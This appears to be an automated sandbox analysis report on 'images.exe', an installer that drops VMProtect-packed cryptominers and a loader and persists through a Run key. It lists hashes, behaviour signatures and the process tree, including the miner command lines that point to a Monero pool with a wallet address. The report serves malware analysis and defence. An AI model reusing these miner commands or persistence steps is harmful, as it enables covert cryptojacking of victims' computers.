Overview

overview

7

Static

static

7

images.exe

windows7-x64

7

images.exe

windows10-2004-x64

7

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$PLUGINSDIR/inetc.dll

windows7-x64

3

$PLUGINSDIR/inetc.dll

windows10-2004-x64

3

$R0/NsCpuC...32.exe

windows7-x64

7

$R0/NsCpuC...32.exe

windows10-2004-x64

7

$R0/NsCpuC...64.exe

windows7-x64

7

$R0/NsCpuC...64.exe

windows10-2004-x64

7

$R0/NsGpuCNMiner.exe

windows7-x64

7

$R0/NsGpuCNMiner.exe

windows10-2004-x64

7

$R0/load.exe

windows7-x64

7

$R0/load.exe

windows10-2004-x64

7

$PLUGINSDIR/inetc.dll

windows7-x64

3

$PLUGINSDIR/inetc.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 10:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    images.exe

  • Size

    4.5MB

  • MD5

    32f21ab8cf9b96e8ba86395a0edc2e4f

  • SHA1

    2a5b3c07e32b3b2b0c1ef33a10685027703440ec

  • SHA256

    20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d

  • SHA512

    d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c

  • SSDEEP

    98304:DMUaI9OMzejqikpYbAI7XLyhq6IvorAJKn6kD801cgl0+BhV1C8q0DBAvD:I8Oxy61y6g38ScglnBh20FMD

Score
7/10
discoverypersistencevmprotect

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • NSIS installer 4 IoCs
    installer
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\images.exe
    "C:\Users\Admin\AppData\Local\Temp\images.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Users\Admin\AppData\Roaming\Images\image.exe
      "C:\Users\Admin\AppData\Roaming\Images\image.exe" SW_HIDE
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43rZr2dDZTKS1MtfWqYeAwWijfNME2u6Z6Peh3DZmBie9BkZiXtiMvRWxrAucA5PsQBs17MmuzidoFWwofhkWzEBUGkKVBe -p x
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
      • C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe
        "C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -u 43rZr2dDZTKS1MtfWqYeAwWijfNME2u6Z6Peh3DZmBie9BkZiXtiMvRWxrAucA5PsQBs17MmuzidoFWwofhkWzEBUGkKVBe -p x
        3⤵
        • Executes dropped EXE
        PID:752
      • C:\Users\Admin\AppData\Roaming\Images\load.exe
        "C:\Users\Admin\AppData\Roaming\Images\load.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4700

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7067C2300B3C5B8750D4DEF7C03F30B0
    Filesize

    345B

    MD5

    1a2fcc2b961beda04d8f8d4135759a4c

    SHA1

    25dc5eee0333533aa0476fbe9d35ecc77f48a460

    SHA256

    ac6b6025fd3a31beb1cb8f4b9bcad7b941312b12ac8a74aa1219fff35f865171

    SHA512

    426970f0f185ddd71c7767b19a56a46007ee76db9ecb2546f3ff1da46f19828327dc294fb81ba350fcf1df7c64778acbbb521fa9ebf12bd597d74df90bfd4b06

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
    Filesize

    192B

    MD5

    9d94685fb9ac6907513f964555554f38

    SHA1

    f4421d451539c3558fed835c1595cd1a56e328f7

    SHA256

    edb0b7edb817871238bb3865d018991fa316500b689055bc22334bd7444fac2a

    SHA512

    f853b7023666306c4c7706bcd61d6e3c1901cc6f1adc364dd33d2bfe038bd67fb39ad849443f7cd38106fdc784f10e8d38dbe6496b98eae9ad58f37c63d43394

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7067C2300B3C5B8750D4DEF7C03F30B0
    Filesize

    544B

    MD5

    1bbb5840bc6e8dda47e2c699291efe00

    SHA1

    550f1dbbf4c72fb318e8fbe54e66aecd36a320a3

    SHA256

    410ddbf998fa66f1de881061bb38224d92e3f175971c05c90448107be68ddf9f

    SHA512

    20883c0cd20b77df0836fffec01d1d255ef1917eaa7ac27fe545c1fcea537af7b152f429952dbd48be24639a819bf2c561ef5e0d24a65225ee64f3ac7d21baa4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\nsi8D4D.tmp\System.dll
    Filesize

    11KB

    MD5

    c17103ae9072a06da581dec998343fc1

    SHA1

    b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d

    SHA256

    dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f

    SHA512

    d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\nsl6F26.tmp\inetc.dll
    Filesize

    21KB

    MD5

    d7a3fa6a6c738b4a3c40d5602af20b08

    SHA1

    34fc75d97f640609cb6cadb001da2cb2c0b3538a

    SHA256

    67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

    SHA512

    75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Images\NsCpuCNMiner64.exe
    Filesize

    1.5MB

    MD5

    eedb9d86ae8abc65fa7ac7c6323d4e8f

    SHA1

    ce1fbf382e89146ea5a22ae551b68198c45f40e4

    SHA256

    d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078

    SHA512

    9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Images\NsGpuCNMiner.exe
    Filesize

    1.5MB

    MD5

    35d2c42b6ee0acbce9dfe8cc418fe5d8

    SHA1

    66b965d1ee4013c80f7e0e27725e43f3d316325a

    SHA256

    7a2a860bb344526e8546acd172522b4d276a4647f43dd4720281d40e390b283e

    SHA512

    00d89a686995d7b2415f6de5786a175232606cb962744149129ed329fcbf0d4ee076e9bc1125adcaa58571ade5f22372b0bef2d2af78dd12378654e6e23b5ebf

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Images\image.exe
    Filesize

    4.5MB

    MD5

    32f21ab8cf9b96e8ba86395a0edc2e4f

    SHA1

    2a5b3c07e32b3b2b0c1ef33a10685027703440ec

    SHA256

    20389c7d417ec512e18bb246a693ce37e041390b6cf1cdd5dca0728b709f910d

    SHA512

    d7fc84e52ad671f55f07bd46a06ea3b881606f21c457e21d50bc45e08339926d13890792503d3bca46edc866f7a739cf7b845f0182ed18bcdb70bca1db011f6c

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Images\load.exe
    Filesize

    44KB

    MD5

    bc6db57b6f9118ecb27625cb7646688a

    SHA1

    0f864d398c98f3bde6304145b3f65fa65e62d320

    SHA256

    115d327daa7b69fac688a274f18629d3a0dbc92726413af45ab71e51bd03df28

    SHA512

    815d2195c8e8e0e4a9d922f9c6e17259be78ceda370968c2aa1a8fbc82717cdc7d255dbfa9f95e8dab931c18f03d08eef3fb0e3231a8f01cb0bfda64eb53d754

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Images\pools.txt
    Filesize

    160B

    MD5

    7dc8fd6041f1fd72d9ca2140d0973e5f

    SHA1

    f51572e60f541044672256c1f2aab74736d78c33

    SHA256

    b209b7af96ab8da92860bda8856a4b5632e142011489de12cac9487fc22c652d

    SHA512

    9abc1a281287665378544d1766ac86a1cb217ba0daf1ed27e05d58bfd4e048237292e531b13e9c1bf3349dfcd9bada23dadd482a4ae267a58a97809f8c03774a

    Download Submit

  • memory/752-70-0x00007FF6C0320000-0x00007FF6C06DC000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2360-60-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2360-74-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp

    Filesize

    3.7MB

    Download

  • memory/2360-93-0x00007FF647D00000-0x00007FF6480AD000-memory.dmp

    Filesize

    3.7MB

    Download